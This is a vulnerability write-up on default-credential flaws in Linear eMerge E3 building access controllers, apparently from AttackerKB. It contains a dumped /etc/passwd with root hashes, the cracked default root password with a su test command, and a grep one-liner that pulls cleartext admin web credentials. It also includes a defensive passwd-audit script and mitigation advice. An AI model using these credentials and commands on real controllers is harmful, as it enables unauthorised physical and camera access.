CVE-2019-7252
Description
Linear eMerge E3-Series devices have Default Credentials.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
In my article cve-2019-7256 at attackerkb.com, I already elaborated on the security risks and vulnerabilities that still exist on the Linear eMerge E3 access controller.
Besides the RCE vulnerabilities, default credentials also exist in the vulnerable configuration, and they can be easily leveraged to gain privileged access to the system.
There are two significant vulnerabilities:
The first one is a default root password whose hash is stored in /etc/passwd on the vulnerable configuration. It can be used to escalate to root privileges after exploiting the RCE vulnerability CVE-2019-7256, or in combination with ssh (if enabled) to get root access to the access controller.
The second credential vulnerability allows an unauthenticated malicious actor to obtain the web credentials of the user admin from the Spider database, which is world-readable on the access controller. With this access, the malicious actor can control the Linear eMerge E3 access platform: access to the building and its cameras, and the authority to manage the access rights of users.
Let's quickly demonstrate both vulnerabilities.
We assume that we have already gained access to the system using the RCE described in CVE-2019-7256.
ls -l /etc/passwd
-rwxr--r-- 1 e3user linear 733 Nov 13 2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
As you can see, the default root password hash is stored directly in /etc/passwd and is world-readable. Normally, password hashes are stored in /etc/shadow, which is readable only by root. With this configuration, it is very easy to retrieve the hash and run a dictionary or brute-force attack with, for instance, hashcat to recover the password. And do not worry, somebody already did this job in 2019 ;-) -> davestyle.
To test whether the default root password is still set:
echo davestyle | su -c whoami root
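A defender-side check for the condition shown above, added here as an example and not part of the original assessment: it parses text in /etc/passwd format, flags every account whose password field carries a hash instead of the shadow placeholder, names the crypt scheme, and rates root and MD5-crypt ($1$) entries highest. The sample passwd content and its hashes are constructed, and the mode 0o744 mirrors the -rwxr--r-- listing above.

```python
import stat

# Constructed sample in /etc/passwd format. The hashes are made-up placeholders,
# not the device's real ones; the layout mirrors the listing above.
SAMPLE_PASSWD = """root:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$CCCCCCCC$DDDDDDDDDDDDDDDDDDDDDD:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$6$EEEEEEEE$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
locked:!:1002:1002:locked:/home/locked:/bin/false
"""

# Password-field values that mean "hash lives in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!", ""}

# crypt(3) scheme prefixes. $1$ (MD5-crypt) is cheap to brute-force on modern GPUs.
WEAK_SCHEMES = {"$1$": "md5crypt"}
STRONG_SCHEMES = {"$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt", "$2b$": "bcrypt"}


def find_hashed_entries(passwd_text: str) -> list[tuple[str, int, str]]:
    """Return (user, uid, scheme) for each account whose hash sits in /etc/passwd itself."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue  # blank, comment or malformed line
        user, pw, uid = fields[0], fields[1], int(fields[2])
        if pw in SHADOWED_OR_LOCKED:
            continue
        scheme = "descrypt"  # no $id$ prefix means traditional DES crypt
        for prefix, name in {**WEAK_SCHEMES, **STRONG_SCHEMES}.items():
            if pw.startswith(prefix):
                scheme = name
                break
        findings.append((user, uid, scheme))
    return findings


def is_world_readable(mode: int) -> bool:
    """True when the 'other' read bit is set, as in the device's -rwxr--r-- (0o744)."""
    return bool(mode & stat.S_IROTH)


def audit(passwd_text: str, mode: int) -> list[str]:
    """One finding per exposed hash; root or a weak scheme rates HIGH, otherwise MEDIUM."""
    exposure = "world-readable" if is_world_readable(mode) else "not world-readable"
    report = []
    for user, uid, scheme in find_hashed_entries(passwd_text):
        weak = scheme in WEAK_SCHEMES.values() or scheme == "descrypt"
        severity = "HIGH" if uid == 0 or weak else "MEDIUM"
        report.append(f"{severity}: {user} (uid {uid}) has a {scheme} hash in passwd, file is {exposure}")
    return report
```

On a real host, pass the contents of /etc/passwd and os.stat("/etc/passwd").st_mode to audit(); an empty list means every hash is shadowed.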
The second credential vulnerability can be exploited by querying the Spider access controller database, which stores user and password information in clear text.
This database resides in /tmp/SpiderDB/Spider.db, and with the command below you can very easily retrieve the admin web credentials.
grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID
ID='admin',Password='xxxxxxx'
And if this is not successful, you can always try the default web credential setting admin:admin.
Another Metasploit module, which tests for the default root password and leaks the admin web credentials, has been submitted upstream to Metasploit.
Mitigation
Change the default root password on your access controller.
Update your Linear eMerge E3 access controller to a version higher than 1.00-06.
References
Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet Storm
Credits
Credit goes to the security researcher below, who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic
General Information
Vendors
- nortekcontrol
Products
- linear emerge elite firmware
- linear emerge essential firmware